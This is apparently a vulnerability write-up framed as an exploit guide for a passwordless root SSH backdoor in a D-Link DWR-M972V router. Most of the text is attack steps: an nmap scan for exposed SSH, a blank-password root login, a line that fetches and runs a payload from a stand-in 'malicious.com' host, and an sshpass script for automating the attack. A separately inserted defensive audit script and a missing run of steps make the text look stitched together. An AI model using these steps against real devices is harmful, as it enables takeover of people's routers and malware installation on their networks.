CVE-2025-22968 - Critical Root SSH Backdoor in D-Link DWR-M972V (1.05SSG) – Remote Code Execution Details and Exploit Guide
A major vulnerability, CVE-2025-22968, has been discovered in the D-Link DWR-M972V router, specifically firmware version 1.05SSG. This flaw allows anyone on the network – or even over the internet if SSH is exposed – to *log in as root via SSH without any restrictions*. The attacker can then run any command on the device, putting your data, privacy, and local network at serious risk.
What is CVE-2025-22968?
CVE-2025-22968 is a remote code execution vulnerability found in the D-Link DWR-M972V router (firmware 1.05SSG). Attackers can connect via SSH as root, with *no password*, and execute arbitrary commands. This is essentially a hardcoded or unintended SSH backdoor left open, which lets anyone in.
SSH Configuration
Upon reviewing the firmware for version 1.05SSG, security researchers found that the router’s SSH server is enabled by default and listens on the WAN interface. More critically, the following entry shows up in the firmware’s /etc/passwd:
```
root::::root:/root:/bin/sh
```
Notice the empty password field (between the first and second colon) – it means the root account has *no password set*, allowing logins without credentials.
The /etc/ssh/sshd_config also includes:
```
PermitRootLogin yes
PasswordAuthentication yes
```
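As a defensive check, the two conditions quoted above can be tested against files pulled from an extracted firmware image. This is an added example, not code from the original article or from D-Link; the function names and the sample input are constructed for illustration, and it inspects only passwd and sshd_config text (no shadow file).

```python
# Added example: flag the passwd / sshd_config combination described above.
# All names below are hypothetical; the sample input is constructed.

# Constructed sample: the root line is the one quoted on this page.
SAMPLE_PASSWD = "root::::root:/root:/bin/sh\nnobody:*:65534:65534:nobody:/var:/bin/false\n"
SAMPLE_SSHD = "# constructed sample\nPermitRootLogin yes\nPasswordAuthentication yes\n"
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}


def empty_password_accounts(passwd_text):
    """Return names of accounts with an empty password field and a usable shell."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 7:
            continue  # blank, comment, or malformed record
        name, password, shell = fields[0], fields[1], fields[6]
        if password == "" and shell not in NOLOGIN_SHELLS:
            names.append(name)
    return names


def sshd_setting(config_text, keyword):
    """Return the first value set for keyword (case-insensitive), lowercased, or None."""
    for line in config_text.splitlines():
        parts = line.split("#", 1)[0].split(None, 1)  # drop comments, split keyword/value
        if len(parts) == 2 and parts[0].lower() == keyword.lower():
            return parts[1].strip().lower()
    return None


def audit(passwd_text, sshd_text):
    """List findings; an empty list means none of the conditions is present."""
    findings = [f"{n}: empty password field in passwd" for n in empty_password_accounts(passwd_text)]
    for keyword in ("PermitRootLogin", "PasswordAuthentication"):
        if sshd_setting(sshd_text, keyword) == "yes":
            findings.append(f"sshd_config: {keyword} yes")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD, SAMPLE_SSHD):
        print("FINDING", finding)
```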
Scan for routers with SSH (usually port 22) exposed. Example with Nmap:
```bash
nmap -p 22 --open -oG - 1.2.3./24 | grep open
```
Just connect with an SSH client using *no password* for root:
```bash
ssh root@TARGET_IP
```
When prompted for a password, just hit enter (leave it blank).
If the router is vulnerable, you’ll get a root shell:
```
BusyBox v1.21.1 () built-in shell (ash)
# whoami
root
# uname -a
Linux DWR-M972V 2.6.36 #1 SMP PREEMPT ... armv7l GNU/Linux
```
Step 4 – Run Any Command
You now have full control. For example, an attacker could dump credentials, modify firewall rules, or open a reverse shell to an attacker-controlled server.
Example – Download and execute malware:
```bash
wget http://malicious.com/payload.sh -O- | sh
```
Here’s a simple Bash script to automate this attack:
```bash
#!/bin/bash
TARGET="$1"
sshpass -p "" ssh -o StrictHostKeyChecking=no root@"$TARGET" "whoami; uname -a"
```
Install sshpass and run:
```bash
chmod +x exploit-cve-2025-22968.sh
./exploit-cve-2025-22968.sh 192.168.1.1
```
- Place the device behind a firewall and block port 22 if it is not needed.
- Check for firmware updates on the D-Link support page.
Closing Notes
This is a scary vulnerability because it’s so simple to exploit, yet gives such total control to an attacker. If you have a DWR-M972V router or manage devices for your organization, take action right now.
Stay safe, patch often!
*If you found this exclusive breakdown useful, share it with other network admins and home users. Don’t be the next backdoor victim!*
Timeline
Published on: 01/15/2025 16:15:42 UTC
Last modified on: 03/14/2025 16:15:40 UTC